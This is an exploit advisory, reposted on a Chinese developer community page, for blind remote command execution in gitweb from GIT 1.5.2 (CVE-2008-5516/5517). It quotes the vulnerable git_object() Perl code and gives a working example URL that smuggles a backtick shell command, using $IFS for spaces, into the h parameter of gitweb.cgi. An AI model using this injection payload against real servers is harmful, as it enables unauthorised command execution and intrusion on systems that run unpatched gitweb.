gitWeb v1.5.2 Remote Command Execution-阿里云开发者社区

开发者社区> 开发与运维> 正文

gitWeb v1.5.2 Remote Command Execution

简介: # Exploit Title: gitWeb remote command execution # Date: 2009.

# Exploit Title: gitWeb remote command execution
# Date: 2009.06.19
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: GIT 1.5.2
# Tested on: debian linux, GIT 1.5.2
# CVE: CVE-2008-5516 - CVE-2008-5517
  
# Code:
  
# The cgi script doesn't show the command output *blind command execution ;)*
# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()
  
  
sub git_object {
        # object is defined by:
        # - hash or hash_base alone
        # - hash_base and file_name
        my $type;
  
        # - hash or hash_base alone
        if ($hash || ($hash_base && !defined $file_name)) {
                my $object_id = $hash || $hash_base;
  
                my $git_command = git_cmd_str();
                open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"
                        or die_error('404 Not Found', "Object does not exist");
                $type = <$fd>;
                chomp $type;
                close $fd
                        or die_error('404 Not Found', "Object does not exist");
  
        # - hash_base and file_name
  
# Example
http://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785

 

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:
开发与运维
使用钉钉扫一扫加入圈子
+ 订阅

集结各类场景实战经验,助你开发运维畅行无忧

其他文章